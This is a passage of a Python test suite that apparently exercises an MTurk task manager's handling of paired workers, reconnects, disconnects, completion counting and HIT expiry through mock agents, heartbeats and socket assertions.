assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_1 = \
make_packet_handler(test_agent_1, dummy, dummy, msg_callback_1)
test_agent_1.setup_socket(server_url, message_handler_1)
test_agent_1.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_1, mturk_manager,
AssignState.STATUS_WAITING)
mturk_manager_assign_1 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_1]
assign_state_1 = mturk_manager_assign_1.state
# Start heartbeats for 1
test_agent_1.always_beat = True
test_agent_1.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Ensure agent 1 is sitting in a waiting world now
assert test_agent_1.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_1.status, AssignState.STATUS_WAITING)
# Set up the second agent
test_agent_2 = MockAgent(opt, hit_id, assign_id_2,
worker_id_2, task_group_id)
def msg_callback_2(packet):
nonlocal message_num
nonlocal test_agent_2
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_2.wants_to_send = True
elif test_agent_2.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_2 = \
make_packet_handler(test_agent_2, dummy, dummy, msg_callback_2)
test_agent_2.setup_socket(server_url, message_handler_2)
test_agent_2.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_2, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id_2].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
# Start heartbeats for 2
test_agent_2.always_beat = True
test_agent_2.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Ensure both agents are in a task world
assert test_agent_1.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
check_status(assign_state_1.status, AssignState.STATUS_IN_TASK)
assert test_agent_2.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
check_status(assign_state_2.status, AssignState.STATUS_IN_TASK)
first_agent = None
second_agent = None
assert test_agent_1.wants_to_send or test_agent_2.wants_to_send, \
'Neither agent is ready to send a message after arriving in task'
if test_agent_1.wants_to_send:
first_agent = test_agent_1
second_agent = test_agent_2
else:
second_agent = test_agent_1
first_agent = test_agent_2
# Step through the task
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
second_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
assert len(assign_state_1.messages) == 3, \
'Not all of the messages have been stored into the state, found {} ' \
'when expecting 3'.format(len(assign_state_1.messages))
assert len(assign_state_2.messages) == 3, \
'Not all of the messages have been stored into the state, found {} ' \
'when expecting 3'.format(len(assign_state_2.messages))
second_agent.send_message(expected_messages[message_num])
test_agent_1.always_beat = False
test_agent_2.always_beat = False
wait_for_state_time(3, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
assert mturk_manager.completed_conversations == 1, \
'Complete conversation not marked as complete'
assert mturk_manager_assign_1.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager_assign_2.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_1), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_2), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
completed_threads[DUO_NO_ONBOARDING_TEST] = True
def test_duo_valid_reconnects(opt, server_url):
"""Tests reconnects during the task which should reload the conversation
state, as well as completing a task after a reconnect.
"""
global completed_threads
print('{} Starting'.format(DUO_VALID_RECONNECT_TEST))
opt['task'] = DUO_VALID_RECONNECT_TEST
hit_id = FAKE_HIT_ID.format(DUO_VALID_RECONNECT_TEST)
assign_id_1 = FAKE_ASSIGNMENT_ID.format(DUO_VALID_RECONNECT_TEST, 1)
worker_id_1 = FAKE_WORKER_ID.format(DUO_VALID_RECONNECT_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(DUO_VALID_RECONNECT_TEST, 2)
worker_id_2 = FAKE_WORKER_ID.format(DUO_VALID_RECONNECT_TEST, 2)
connection_id_1 = '{}_{}'.format(worker_id_1, assign_id_1)
connection_id_2 = '{}_{}'.format(worker_id_2, assign_id_2)
message_num = 0
refresh_was_valid = False
expected_messages = [
TestDuoWorld.MESSAGE_1, TestDuoWorld.MESSAGE_2,
TestDuoWorld.MESSAGE_3, TestDuoWorld.MESSAGE_4
]
mturk_agent_id_1 = AGENT_1_ID
mturk_agent_id_2 = AGENT_2_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id_1, mturk_agent_id_2],
is_test=True
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_duo_world,
args=(opt, mturk_manager, False))
world_thread.daemon = True
world_thread.start()
# create and set up the first agent
test_agent_1 = MockAgent(opt, hit_id, assign_id_1,
worker_id_1, task_group_id)
def msg_callback_1(packet):
nonlocal message_num
nonlocal test_agent_1
nonlocal refresh_was_valid
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_1.wants_to_send = True
elif packet.data['text'] == data_model.COMMAND_RESTORE_STATE:
messages = packet.data['messages']
assert messages[0]['text'] == expected_messages[0], 'first ' \
'message in restore state {} not as expected {}'.format(
messages[0], expected_messages[0]
)
assert messages[1]['text'] == expected_messages[1], 'second ' \
'message in restore state {} not as expected {}'.format(
messages[1], expected_messages[1]
)
assert packet.data['last_command']['text'] == \
data_model.COMMAND_SEND_MESSAGE, 'restore state didn\'t '\
'include command to send a new message'
refresh_was_valid = True
elif test_agent_1.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_1 = \
make_packet_handler(test_agent_1, dummy, dummy, msg_callback_1)
test_agent_1.setup_socket(server_url, message_handler_1)
test_agent_1.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_1, mturk_manager,
AssignState.STATUS_WAITING)
mturk_manager_assign_1 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_1]
assign_state_1 = mturk_manager_assign_1.state
# Start heartbeats for 1
test_agent_1.always_beat = True
test_agent_1.send_heartbeat()
wait_for_state_time(2, mturk_manager)
# Ensure agent 1 is sitting in a waiting world now
assert test_agent_1.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_1.status, AssignState.STATUS_WAITING)
# Set up the second agent
test_agent_2 = MockAgent(opt, hit_id, assign_id_2,
worker_id_2, task_group_id)
def msg_callback_2(packet):
nonlocal message_num
nonlocal test_agent_2
nonlocal refresh_was_valid
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_2.wants_to_send = True
elif packet.data['text'] == data_model.COMMAND_RESTORE_STATE:
messages = packet.data['messages']
assert messages[0]['text'] == expected_messages[0], 'first ' \
'message in restore state {} not as expected {}'.format(
messages[0], expected_messages[0]
)
assert messages[1]['text'] == expected_messages[1], 'second ' \
'message in restore state {} not as expected {}'.format(
messages[1], expected_messages[1]
)
assert packet.data['last_command']['text'] == \
data_model.COMMAND_SEND_MESSAGE, 'restore state didn\'t '\
'include command to send a new message'
refresh_was_valid = True
elif test_agent_2.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_2 = \
make_packet_handler(test_agent_2, dummy, dummy, msg_callback_2)
test_agent_2.setup_socket(server_url, message_handler_2)
test_agent_2.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_2, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id_2].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
# Start heartbeats for 2
test_agent_2.always_beat = True
test_agent_2.send_heartbeat()
wait_for_state_time(2, mturk_manager)
# Ensure both agents are in a task world
assert test_agent_1.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
assert test_agent_2.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
check_status(assign_state_1.status, AssignState.STATUS_IN_TASK)
check_status(assign_state_2.status, AssignState.STATUS_IN_TASK)
first_agent = None
second_agent = None
assert test_agent_1.wants_to_send or test_agent_2.wants_to_send, \
'Neither agent is ready to send a message after arriving in task'
if test_agent_1.wants_to_send:
first_agent = test_agent_1
second_agent = test_agent_2
else:
second_agent = test_agent_1
first_agent = test_agent_2
# Step through the task
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
second_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
# Simulate a refresh, msg callback will verify it was valid
first_agent.conversation_id = None
first_agent.send_alive()
wait_for_state_time(4, mturk_manager)
assert refresh_was_valid, 'Information sent on refresh was invalid'
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
assert len(assign_state_1.messages) == 3, \
'Not all of the messages have been stored into the state, found {} ' \
'when expecting 3'.format(len(assign_state_1.messages))
assert len(assign_state_2.messages) == 3, \
'Not all of the messages have been stored into the state, found {} ' \
'when expecting 3'.format(len(assign_state_2.messages))
second_agent.send_message(expected_messages[message_num])
test_agent_1.always_beat = False
test_agent_2.always_beat = False
wait_for_state_time(3, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
assert mturk_manager.completed_conversations == 1, \
'Complete conversation not marked as complete'
assert mturk_manager_assign_1.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager_assign_2.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_1), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_2), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
completed_threads[DUO_VALID_RECONNECT_TEST] = True
def test_duo_one_disconnect(opt, server_url):
"""Tests whether disconnects properly cause a task to fail and let the
non-disconnecting partner complete the HIT. Also tests reconnecting after
a partner's disconnect and after one's own disconnect.
"""
global completed_threads
print('{} Starting'.format(DUO_ONE_DISCONNECT_TEST))
opt['task'] = DUO_ONE_DISCONNECT_TEST
hit_id = FAKE_HIT_ID.format(DUO_ONE_DISCONNECT_TEST)
assign_id_1 = FAKE_ASSIGNMENT_ID.format(DUO_ONE_DISCONNECT_TEST, 1)
worker_id_1 = FAKE_WORKER_ID.format(DUO_ONE_DISCONNECT_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(DUO_ONE_DISCONNECT_TEST, 2)
worker_id_2 = FAKE_WORKER_ID.format(DUO_ONE_DISCONNECT_TEST, 2)
connection_id_1 = '{}_{}'.format(worker_id_1, assign_id_1)
connection_id_2 = '{}_{}'.format(worker_id_2, assign_id_2)
message_num = 0
partner_disconnects = 0
self_disconnects = 0
expected_messages = [
TestDuoWorld.MESSAGE_1, TestDuoWorld.MESSAGE_2,
MTURK_DISCONNECT_MESSAGE
]
mturk_agent_id_1 = AGENT_1_ID
mturk_agent_id_2 = AGENT_2_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id_1, mturk_agent_id_2],
is_test=True
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_duo_world,
args=(opt, mturk_manager, False))
world_thread.daemon = True
world_thread.start()
# create and set up the first agent
test_agent_1 = MockAgent(opt, hit_id, assign_id_1,
worker_id_1, task_group_id)
def msg_callback_1(packet):
nonlocal message_num
nonlocal test_agent_1
nonlocal partner_disconnects
nonlocal self_disconnects
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_1.wants_to_send = True
elif packet.data['text'] == data_model.COMMAND_INACTIVE_DONE:
partner_disconnects += 1
elif packet.data['text'] == data_model.COMMAND_INACTIVE_HIT:
self_disconnects += 1
elif test_agent_1.conversation_id is not None and \
test_agent_1.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_1 = \
make_packet_handler(test_agent_1, dummy, dummy, msg_callback_1)
test_agent_1.setup_socket(server_url, message_handler_1)
test_agent_1.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_1, mturk_manager,
AssignState.STATUS_WAITING)
mturk_manager_assign_1 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_1]
assign_state_1 = mturk_manager_assign_1.state
# Start heartbeats for 1
test_agent_1.always_beat = True
test_agent_1.send_heartbeat()
wait_for_state_time(2, mturk_manager)
# Ensure agent 1 is sitting in a waiting world now
assert test_agent_1.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_1.status, AssignState.STATUS_WAITING)
# Set up the second agent
test_agent_2 = MockAgent(opt, hit_id, assign_id_2,
worker_id_2, task_group_id)
def msg_callback_2(packet):
nonlocal message_num
nonlocal test_agent_2
nonlocal partner_disconnects
nonlocal self_disconnects
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_2.wants_to_send = True
elif packet.data['text'] == data_model.COMMAND_INACTIVE_DONE:
partner_disconnects += 1
elif packet.data['text'] == data_model.COMMAND_INACTIVE_HIT:
self_disconnects += 1
elif test_agent_2.conversation_id is not None and \
test_agent_2.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_2 = \
make_packet_handler(test_agent_2, dummy, dummy, msg_callback_2)
test_agent_2.setup_socket(server_url, message_handler_2)
test_agent_2.wait_for_alive()
wait_for_state_time(2.5, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_2, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id_2].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
# Start heartbeats for 2
test_agent_2.always_beat = True
test_agent_2.send_heartbeat()
wait_for_state_time(2.5, mturk_manager)
# Ensure both agents are in a task world
assert test_agent_1.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
assert test_agent_2.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
check_status(assign_state_1.status, AssignState.STATUS_IN_TASK)
check_status(assign_state_2.status, AssignState.STATUS_IN_TASK)
first_agent = None
second_agent = None
mturk_first_agent = None
mturk_second_agent = None
assert test_agent_1.wants_to_send or test_agent_2.wants_to_send, \
'Neither agent is ready to send a message after arriving in task'
if test_agent_1.wants_to_send:
first_agent = test_agent_1
second_agent = test_agent_2
mturk_first_agent = mturk_manager_assign_1
mturk_second_agent = mturk_manager_assign_2
else:
second_agent = test_agent_1
first_agent = test_agent_2
mturk_second_agent = mturk_manager_assign_1
mturk_first_agent = mturk_manager_assign_2
# Step through the task
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
second_agent.send_message(expected_messages[message_num])
# Disconnect the first agent
first_agent.always_beat = False
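# With heartbeats stopped, the manager should flag this agent as disconnected after DISCONNECT_WAIT_TIME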
wait_for_state_time(2, mturk_manager)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
assert partner_disconnects == 1, \
'Connected agent did not receive an inactive_done command'
# Refresh the second agent
second_agent.conversation_id = None
second_agent.send_alive()
wait_for_state_time(2, mturk_manager)
assert partner_disconnects == 2, \
'Reconnected agent did not receive an inactive_done command'
# Refresh the first agent
first_agent.conversation_id = None
first_agent.send_alive()
wait_for_state_time(2, mturk_manager)
assert self_disconnects == 1, \
'Disconnected agent did not receive an inactive command'
# Disconnect the second agent
second_agent.always_beat = False
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(mturk_second_agent.state.status,
AssignState.STATUS_PARTNER_DISCONNECT)
check_status(mturk_first_agent.state.status,
AssignState.STATUS_DISCONNECT)
assert mturk_manager.completed_conversations == 0, \
'Incomplete conversation marked as complete'
assert mturk_second_agent.disconnected == False, \
'MTurk manager improperly marked the connected agent as disconnected'
assert mturk_first_agent.disconnected == True, \
'MTurk did not mark the disconnected agent as so'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_1), \
'The socket manager didn\'t close the socket upon failure of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_2), \
'The socket manager didn\'t close the socket upon failure of the ' \
'task, though it should have'
completed_threads[DUO_ONE_DISCONNECT_TEST] = True
def test_count_complete(opt, server_url):
"""Starts two worlds even though only one is requested by using the
count_complete flag.
"""
global completed_threads
print('{} Starting'.format(COUNT_COMPLETE_TEST))
opt['task'] = COUNT_COMPLETE_TEST
opt['count_complete'] = True
opt['num_conversations'] = 1
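# With count_complete set, only finished conversations count toward num_conversations, so a second world can start while the first is still running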
hit_id = FAKE_HIT_ID.format(COUNT_COMPLETE_TEST)
assign_id_1 = FAKE_ASSIGNMENT_ID.format(COUNT_COMPLETE_TEST, 1)
worker_id_1 = FAKE_WORKER_ID.format(COUNT_COMPLETE_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(COUNT_COMPLETE_TEST, 2)
worker_id_2 = FAKE_WORKER_ID.format(COUNT_COMPLETE_TEST, 2)
last_command = None
message_num_1 = 0
message_num_2 = 0
expected_messages = [TestSoloWorld.TEST_TEXT_1, TestSoloWorld.TEST_TEXT_2]
mturk_agent_id = AGENT_1_ID
mturk_manager = MTurkManager(opt=opt,
mturk_agent_ids=[mturk_agent_id],
is_test=True)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_solo_world,
args=(opt, mturk_manager, False))
world_thread.daemon = True
world_thread.start()
# Create an agent and set it up to connect
def msg_callback_1(packet):
nonlocal last_command
nonlocal message_num_1
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command = packet
else:
assert packet.data['text'] == expected_messages[message_num_1], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num_1],
message_num_1,
packet.data['text']
)
message_num_1 += 1
test_agent_1 = \
MockAgent(opt, hit_id, assign_id_1, worker_id_1, task_group_id)
message_handler = \
make_packet_handler(test_agent_1, dummy, dummy, msg_callback_1)
test_agent_1.setup_socket(server_url, message_handler)
test_agent_1.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_1, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign_1 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_1]
assign_state_1 = mturk_manager_assign_1.state
# Run through onboarding
test_agent_1.always_beat = True
test_agent_1.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Run through task
assert test_agent_1.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num_1)
test_agent_1.send_message('Hello1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_IN_TASK)
assert len(assign_state_1.messages) == 3, \
'Not all of the messages have been stored into the state, found {} ' \
'when expecting 3'.format(len(assign_state_1.messages))
# Start the second agent while the first is still in its task
def msg_callback_2(packet):
nonlocal last_command
nonlocal message_num_2
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command = packet
else:
assert packet.data['text'] == expected_messages[message_num_2], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num_2],
message_num_2,
packet.data['text']
)
message_num_2 += 1
test_agent_2 = \
MockAgent(opt, hit_id, assign_id_2, worker_id_2, task_group_id)
message_handler = \
make_packet_handler(test_agent_2, dummy, dummy, msg_callback_2)
test_agent_2.setup_socket(server_url, message_handler)
test_agent_2.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_2, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id_2].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
# Run through onboarding
test_agent_2.always_beat = True
test_agent_2.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Run through task
assert test_agent_2.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num_2)
test_agent_2.send_message('Hello1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state_2.status, AssignState.STATUS_IN_TASK)
assert len(assign_state_2.messages) == 3, \
'Not all of the messages have been stored into the state, found {} ' \
'when expecting 3'.format(len(assign_state_2.messages))
test_agent_2.send_message('Hello2', dummy)
test_agent_2.always_beat = False
# Finish agent 1's task
test_agent_1.send_message('Hello2', dummy)
test_agent_1.always_beat = False
wait_for_state_time(2, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
# Wait for both to disconnect
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
assert len(assign_state_1.messages) == 0, \
'Messages were not cleared upon completion of the task'
assert len(assign_state_2.messages) == 0, \
'Messages were not cleared upon completion of the task'
assert mturk_manager_assign_1.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager_assign_2.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager.started_conversations == 2, \
'At least one conversation wasn\'t successfully logged'
assert mturk_manager.completed_conversations == 2, \
'At least one conversation wasn\'t successfully logged'
assert message_num_1 == 2, 'Not all messages were successfully processed'
assert message_num_2 == 2, 'Not all messages were successfully processed'
completed_threads[COUNT_COMPLETE_TEST] = True
def test_expire_hit(opt, server_url):
"""Tests force_expire_hit by creating 4 workers, leaving
one in onboarding and sending 3 to waiting, then ensuring that the
remaining waiting worker gets expired"""
global completed_threads
print('{} Starting'.format(EXPIRE_HIT_TEST))
opt['task'] = EXPIRE_HIT_TEST
opt['count_complete'] = True
hit_id = FAKE_HIT_ID.format(EXPIRE_HIT_TEST)
assign_id_1 = FAKE_ASSIGNMENT_ID.format(EXPIRE_HIT_TEST, 1)
worker_id_1 = FAKE_WORKER_ID.format(EXPIRE_HIT_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(EXPIRE_HIT_TEST, 2)
worker_id_2 = FAKE_WORKER_ID.format(EXPIRE_HIT_TEST, 2)
assign_id_3 = FAKE_ASSIGNMENT_ID.format(EXPIRE_HIT_TEST, 3)
worker_id_3 = FAKE_WORKER_ID.format(EXPIRE_HIT_TEST, 3)
assign_id_4 = FAKE_ASSIGNMENT_ID.format(EXPIRE_HIT_TEST, 4)
worker_id_4 = FAKE_WORKER_ID.format(EXPIRE_HIT_TEST, 4)
connection_id_1 = '{}_{}'.format(worker_id_1, assign_id_1)
connection_id_2 = '{}_{}'.format(worker_id_2, assign_id_2)
connection_id_3 = '{}_{}'.format(worker_id_3, assign_id_3)
connection_id_4 = '{}_{}'.format(worker_id_4, assign_id_4)
last_command_3 = None
last_command_4 = None
message_num = 0
expected_messages = [
TestDuoWorld.MESSAGE_1, TestDuoWorld.MESSAGE_2,
TestDuoWorld.MESSAGE_3, TestDuoWorld.MESSAGE_4
]
mturk_agent_id_1 = AGENT_1_ID
mturk_agent_id_2 = AGENT_2_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id_1, mturk_agent_id_2],
is_test=True
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_duo_world,
args=(opt, mturk_manager, True))
world_thread.daemon = True
world_thread.start()
# create and set up the two agents
test_agent_1 = MockAgent(opt, hit_id, assign_id_1,
worker_id_1, task_group_id)
def msg_callback_1(packet):
nonlocal message_num
nonlocal test_agent_1
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_1.wants_to_send = True
elif test_agent_1.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
test_agent_2 = MockAgent(opt, hit_id, assign_id_2,
worker_id_2, task_group_id)
def msg_callback_2(packet):
nonlocal message_num
nonlocal test_agent_2
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_2.wants_to_send = True
elif test_agent_2.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
test_agent_3 = MockAgent(opt, hit_id, assign_id_3,
worker_id_3, task_group_id)
def msg_callback_3(packet):
nonlocal last_command_3
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command_3 = packet
test_agent_4 = MockAgent(opt, hit_id, assign_id_4,
worker_id_4, task_group_id)
def msg_callback_4(packet):
nonlocal last_command_4
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command_4 = packet
message_handler_1 = \
make_packet_handler(test_agent_1, dummy, dummy, msg_callback_1)
message_handler_2 = \
make_packet_handler(test_agent_2, dummy, dummy, msg_callback_2)
message_handler_3 = \
make_packet_handler(test_agent_3, dummy, dummy, msg_callback_3)
message_handler_4 = \
make_packet_handler(test_agent_4, dummy, dummy, msg_callback_4)
test_agent_1.setup_socket(server_url, message_handler_1)
test_agent_2.setup_socket(server_url, message_handler_2)
test_agent_3.setup_socket(server_url, message_handler_3)
test_agent_4.setup_socket(server_url, message_handler_4)
test_agent_1.wait_for_alive()
test_agent_2.wait_for_alive()
test_agent_3.wait_for_alive()
test_agent_4.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_1, mturk_manager)
mturk_manager_assign_1 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_1]
assign_state_1 = mturk_manager_assign_1.state
check_new_agent_setup(test_agent_2, mturk_manager)
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id_2].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
check_new_agent_setup(test_agent_3, mturk_manager)
mturk_manager_assign_3 = \
mturk_manager.mturk_workers[worker_id_3].agents[assign_id_3]
assign_state_3 = mturk_manager_assign_3.state
check_new_agent_setup(test_agent_4, mturk_manager)
mturk_manager_assign_4 = \
mturk_manager.mturk_workers[worker_id_4].agents[assign_id_4]
assign_state_4 = mturk_manager_assign_4.state
# Start heartbeats
test_agent_1.always_beat = True
test_agent_1.send_heartbeat()
test_agent_2.always_beat = True
test_agent_2.send_heartbeat()
test_agent_3.always_beat = True
test_agent_3.send_heartbeat()
test_agent_4.always_beat = True
test_agent_4.send_heartbeat()
wait_for_state_time(2, mturk_manager)
# Run agent_1 through onboarding
assert test_agent_1.conversation_id.startswith('o_'), \
'Mock agent didn\'t make it to onboarding'
test_agent_1.send_message('Onboard1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_ONBOARDING)
test_agent_1.send_message('Onboard2', dummy)
wait_for_state_time(3, mturk_manager)
# Ensure agent 1 is sitting in a waiting world now
assert test_agent_1.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_1.status, AssignState.STATUS_WAITING)
# Run agent_2 through onboarding
assert test_agent_2.conversation_id.startswith('o_'), \
'Mock agent didn\'t make it to onboarding'
test_agent_2.send_message('Onboard1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state_2.status, AssignState.STATUS_ONBOARDING)
test_agent_2.send_message('Onboard2', dummy)
wait_for_state_time(3, mturk_manager)
# Ensure both agents are in a task world
assert test_agent_1.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
check_status(assign_state_1.status, AssignState.STATUS_IN_TASK)
